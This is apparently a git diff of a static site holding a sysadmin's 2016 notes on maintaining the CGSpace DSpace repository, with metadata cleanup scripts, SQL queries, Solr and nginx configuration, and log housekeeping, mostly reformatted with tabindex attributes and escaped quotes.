<li>I&rsquo;ve sent a message to Atmire about the Solr error to see if it&rsquo;s related to their batch update module</li>
@ -452,7 +452,7 @@ Exception in thread &quot;Thread-54216&quot; org.apache.solr.client.solrj.impl.H
<ul>
<li>Work on cleanups for author affiliations after Peter sent me his list of corrections/deletions:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i affiliations_pb-322-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i affiliations_pb-322-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p fuuu
$ ./delete-metadata-values.py -f cg.contributor.affiliation -i affiliations_pb-2-deletions.csv -m 211 -u dspace -d dspace -p fuuu
</code></pre><ul>
<li>After that we need to take the top ~300 and make a controlled vocabulary for it</li>
@ -474,7 +474,7 @@ $ ./delete-metadata-values.py -f cg.contributor.affiliation -i affiliations_pb-2
<li>Turns out the Solr search logic switched from OR to AND in DSpace 6.0 and the change is easy to backport: <a href="https://jira.duraspace.org/browse/DS-2809">https://jira.duraspace.org/browse/DS-2809</a></li>
<li>We just need to set this in <code>dspace/solr/search/conf/schema.xml</code>:</li>
</ul>
<pre><code>&lt;solrQueryParser defaultOperator=&quot;AND&quot;/&gt;
<pre tabindex="0"><code>&lt;solrQueryParser defaultOperator=&#34;AND&#34;/&gt;
</code></pre><ul>
<li>It actually works really well, and search results return far fewer hits now (before, after):</li>
</ul>
@ -483,7 +483,7 @@ $ ./delete-metadata-values.py -f cg.contributor.affiliation -i affiliations_pb-2
<ul>
<li>Found a way to improve the configuration of Atmire&rsquo;s Content and Usage Analysis (CUA) module for date fields</li>
</ul>
<pre><code>-content.analysis.dataset.option.8=metadata:dateAccessioned:discovery
<pre tabindex="0"><code>-content.analysis.dataset.option.8=metadata:dateAccessioned:discovery
+content.analysis.dataset.option.8=metadata:dc.date.accessioned:date(month)
</code></pre><ul>
<li>This allows the module to treat the field as a date rather than a text string, so we can interrogate it more intelligently</li>
@ -492,7 +492,7 @@ $ ./delete-metadata-values.py -f cg.contributor.affiliation -i affiliations_pb-2
<li>45 minutes of downtime!</li>
<li>Start processing the fixes to <code>dc.description.sponsorship</code> from Peter Ballantyne:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i sponsors-fix-23.csv -f dc.description.sponsorship -t correct -m 29 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i sponsors-fix-23.csv -f dc.description.sponsorship -t correct -m 29 -d dspace -u dspace -p fuuu
$ ./delete-metadata-values.py -i sponsors-delete-8.csv -f dc.description.sponsorship -m 29 -d dspace -u dspace -p fuuu
</code></pre><ul>
<li>I need to run these and the others from a few days ago on CGSpace the next time we run updates</li>
@ -511,14 +511,14 @@ $ ./delete-metadata-values.py -i sponsors-delete-8.csv -f dc.description.sponsor
<li>Not sure if it&rsquo;s something like we already have too many filters there (30), or the filter name is reserved, etc&hellip;</li>
<li>Generate a list of ILRI subjects for Peter and Abenet to look through/fix:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where resource_type_id=2 and metadata_field_id=203 group by text_value order by count desc) to /tmp/ilrisubjects.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where resource_type_id=2 and metadata_field_id=203 group by text_value order by count desc) to /tmp/ilrisubjects.csv with csv;
</code></pre><ul>
<li>Regenerate Discovery indexes a few times after playing with <code>discovery.xml</code> index definitions (syntax, parameters, etc).</li>
<li>Merge changes to boolean logic in Solr search (<a href="https://github.com/ilri/DSpace/pull/274">#274</a>)</li>
<li>Run all sponsorship and affiliation fixes on CGSpace, deploy latest <code>5_x-prod</code> branch, and re-index Discovery on CGSpace</li>
<li>Tested OCSP stapling on DSpace Test&rsquo;s nginx and it works:</li>
</ul>
<pre><code>$ openssl s_client -connect dspacetest.cgiar.org:443 -servername dspacetest.cgiar.org -tls1_2 -tlsextdebug -status
<pre tabindex="0"><code>$ openssl s_client -connect dspacetest.cgiar.org:443 -servername dspacetest.cgiar.org -tls1_2 -tlsextdebug -status
...
OCSP response:
======================================
@ -533,12 +533,12 @@ OCSP Response Data:
<li>Discuss fixing some ORCIDs for CCAFS author Sonja Vermeulen with Magdalena Haman</li>
<li>This author has a few variations:</li>
</ul>
<pre><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeu
len, S%';
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeu
len, S%&#39;;
</code></pre><ul>
<li>And it looks like <code>fe4b719f-6cc4-4d65-8504-7a83130b9f83</code> is the authority with the correct ORCID linked</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set authority='fe4b719f-6cc4-4d65-8504-7a83130b9f83w', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;fe4b719f-6cc4-4d65-8504-7a83130b9f83w&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen, S%&#39;;
UPDATE 101
</code></pre><ul>
<li>Hmm, now her name is missing from the authors facet and only shows the authority ID</li>
@ -547,7 +547,7 @@ UPDATE 101
<li>On a clean snapshot of the database I see the correct authority should be <code>f01f7b7b-be3f-4df7-a61d-b73c067de88d</code>, not <code>fe4b719f-6cc4-4d65-8504-7a83130b9f83</code></li>
<li>Updating her authorities again and reindexing:</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set authority='f01f7b7b-be3f-4df7-a61d-b73c067de88d', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;f01f7b7b-be3f-4df7-a61d-b73c067de88d&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen, S%&#39;;
UPDATE 101
</code></pre><ul>
<li>Use GitHub icon from Font Awesome instead of a PNG to save one extra network request</li>
@ -564,14 +564,14 @@ UPDATE 101
<li>Minor fix to a string in Atmire&rsquo;s CUA module (<a href="https://github.com/ilri/DSpace/pull/280">#280</a>)</li>
<li>This seems to be what I&rsquo;ll need to do for Sonja Vermeulen (but with <code>2b4166b7-6e4d-4f66-9d8b-ddfbec9a6ae0</code> instead on the live site):</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen SJ%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;09e4da69-33a3-45ca-b110-7d3f82d2d6d2&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen, S%&#39;;
dspacetest=# update metadatavalue set authority=&#39;09e4da69-33a3-45ca-b110-7d3f82d2d6d2&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen SJ%&#39;;
</code></pre><ul>
<li>And then update Discovery and Authority indexes</li>
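<li>The reindexing itself would be the usual launcher commands, roughly (a sketch; paths as used elsewhere in these notes):</li>
</ul>
<pre tabindex="0"><code>$ /home/cgspace.cgiar.org/bin/dspace index-discovery -b
$ /home/cgspace.cgiar.org/bin/dspace index-authority
</code></pre><ul>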
<li>Minor fix for &ldquo;Subject&rdquo; string in Discovery search and Atmire modules (<a href="https://github.com/ilri/DSpace/pull/281">#281</a>)</li>
<li>Start testing batch fixes for ILRI subject from Peter:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i ilrisubjects-fix-32.csv -f cg.subject.ilri -t correct -m 203 -d dspace -u dspace -p fuuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ilrisubjects-fix-32.csv -f cg.subject.ilri -t correct -m 203 -d dspace -u dspace -p fuuuu
$ ./delete-metadata-values.py -i ilrisubjects-delete-13.csv -f cg.subject.ilri -m 203 -d dspace -u dspace -p fuuu
</code></pre><h2 id="2016-09-29">2016-09-29</h2>
<ul>
@ -580,7 +580,7 @@ $ ./delete-metadata-values.py -i ilrisubjects-delete-13.csv -f cg.subject.ilri -
<li>DSpace Test (linode02) became unresponsive for some reason, I had to hard reboot it from the Linode console</li>
<li>People on DSpace mailing list gave me a query to get authors from certain collections:</li>
</ul>
<pre><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/5472', '10568/5473')));
<pre tabindex="0"><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/5472&#39;, &#39;10568/5473&#39;)));
</code></pre><h2 id="2016-09-30">2016-09-30</h2>
<ul>
<li>Deny access to REST API&rsquo;s <code>find-by-metadata-field</code> endpoint to protect against an upstream security issue (DS-3250)</li>
@ -606,15 +606,15 @@ $ ./delete-metadata-values.py -i ilrisubjects-delete-13.csv -f cg.subject.ilri -
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -42,7 +42,7 @@ I exported a random item&rsquo;s metadata as CSV, deleted all columns except id
0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -72,12 +72,12 @@ I exported a random item&rsquo;s metadata as CSV, deleted all columns except id
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -124,7 +124,7 @@ I exported a random item&rsquo;s metadata as CSV, deleted all columns except id
<time datetime="2016-10-03T15:53:00+03:00">Mon Oct 03, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -139,7 +139,7 @@ I exported a random item&rsquo;s metadata as CSV, deleted all columns except id
</li>
<li>I exported a random item&rsquo;s metadata as CSV, deleted <em>all columns</em> except id and collection, and made a new column called <code>ORCID:dc.contributor.author</code> with the following random ORCIDs from the ORCID registry:</li>
</ul>
<pre><code>0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
<pre tabindex="0"><code>0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
</code></pre><ul>
<li>Hmm, with the <code>dc.contributor.author</code> column removed, DSpace doesn&rsquo;t detect any changes</li>
<li>With a blank <code>dc.contributor.author</code> column, DSpace wants to remove all non-ORCID authors and add the new ORCID authors</li>
@ -161,14 +161,14 @@ I exported a random item&rsquo;s metadata as CSV, deleted all columns except id
</li>
<li>That left us with 3,180 valid corrections and 3 deletions:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i authors-fix-3180.csv -f dc.contributor.author -t correct -m 3 -d dspacetest -u dspacetest -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i authors-fix-3180.csv -f dc.contributor.author -t correct -m 3 -d dspacetest -u dspacetest -p fuuu
$ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -m 3 -d dspacetest -u dspacetest -p fuuu
</code></pre><ul>
<li>Remove old about page (<a href="https://github.com/ilri/DSpace/pull/284">#284</a>)</li>
<li>CGSpace crashed a few times today</li>
<li>Generate list of unique authors in CCAFS collections:</li>
</ul>
<pre><code>dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/32729', '10568/5472', '10568/5473', '10568/10288', '10568/70974', '10568/3547', '10568/3549', '10568/3531','10568/16890','10568/5470','10568/3546', '10568/36024', '10568/66581', '10568/21789', '10568/5469', '10568/5468', '10568/3548', '10568/71053', '10568/25167'))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
<pre tabindex="0"><code>dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/32729&#39;, &#39;10568/5472&#39;, &#39;10568/5473&#39;, &#39;10568/10288&#39;, &#39;10568/70974&#39;, &#39;10568/3547&#39;, &#39;10568/3549&#39;, &#39;10568/3531&#39;,&#39;10568/16890&#39;,&#39;10568/5470&#39;,&#39;10568/3546&#39;, &#39;10568/36024&#39;, &#39;10568/66581&#39;, &#39;10568/21789&#39;, &#39;10568/5469&#39;, &#39;10568/5468&#39;, &#39;10568/3548&#39;, &#39;10568/71053&#39;, &#39;10568/25167&#39;))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
</code></pre><h2 id="2016-10-05">2016-10-05</h2>
<ul>
<li>Work on more infrastructure cleanups for Ansible DSpace role</li>
@ -190,13 +190,13 @@ $ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -
<li>Re-deploy CGSpace with latest changes from late September and early October</li>
<li>Run fixes for ILRI subjects and delete blank metadata values:</li>
</ul>
<pre><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
DELETE 11
</code></pre><ul>
<li>Run all system updates and reboot CGSpace</li>
<li>Delete ten gigs of old 2015 Tomcat logs that never got rotated (WTF?):</li>
</ul>
<pre><code>root@linode01:~# ls -lh /var/log/tomcat7/localhost_access_log.2015* | wc -l
<pre tabindex="0"><code>root@linode01:~# ls -lh /var/log/tomcat7/localhost_access_log.2015* | wc -l
47
</code></pre><ul>
<li>Delete 2GB <code>cron-filter-media.log</code> file, as it is just a log from a cron job and it doesn&rsquo;t get rotated like normal log files (almost a year now maybe)</li>
@ -211,7 +211,7 @@ DELETE 11
<ul>
<li>A bit more cleanup on the CCAFS authors, and run the corrections on DSpace Test:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t &#39;correct name&#39; -m 3 -d dspace -u dspace -p fuuu
</code></pre><ul>
<li>One observation is that there are still some old versions of names in the author lookup because authors appear in other communities (as we only corrected authors from CCAFS for this round)</li>
</ul>
@ -219,7 +219,7 @@ DELETE 11
<ul>
<li>Start working on DSpace 5.5 porting work again:</li>
</ul>
<pre><code>$ git checkout -b 5_x-55 5_x-prod
<pre tabindex="0"><code>$ git checkout -b 5_x-55 5_x-prod
$ git rebase -i dspace-5.5
</code></pre><ul>
<li>Have to fix about ten merge conflicts, mostly in the SCSS for the CGIAR theme</li>
@ -248,40 +248,40 @@ $ git rebase -i dspace-5.5
<ul>
<li>Move the LIVES community from the top level to the ILRI projects community</li>
</ul>
<pre><code>$ /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child=10568/25101
<pre tabindex="0"><code>$ /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child=10568/25101
</code></pre><ul>
<li>Start testing some things for DSpace 5.5, like command line metadata import, PDF media filter, and Atmire CUA</li>
<li>Start looking at batch fixing of &ldquo;old&rdquo; ILRI website links without www or https, for example:</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ilri.org%';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like &#39;http://ilri.org%&#39;;
</code></pre><ul>
<li>Also CCAFS has HTTPS and their links should use it where possible:</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ccafs.cgiar.org%';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like &#39;http://ccafs.cgiar.org%&#39;;
</code></pre><ul>
<li>And this will find community and collection HTML text that is using the old style PNG/JPG icons for RSS and email (we should be using Font Awesome icons instead):</li>
</ul>
<pre><code>dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like '%Iconrss2.png%';
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like &#39;%Iconrss2.png%&#39;;
</code></pre><ul>
<li>Turns out there are shit tons of varieties of this, like with http, https, www, separate <code>&lt;/img&gt;</code> tags, alignments, etc</li>
<li>Had to find all variations and replace them individually:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;/&gt;','&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;/&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/Iconrss2.png&quot;/&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/email.jpg&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;/&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;/&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;/&gt;%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;,&#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;%&#39;;
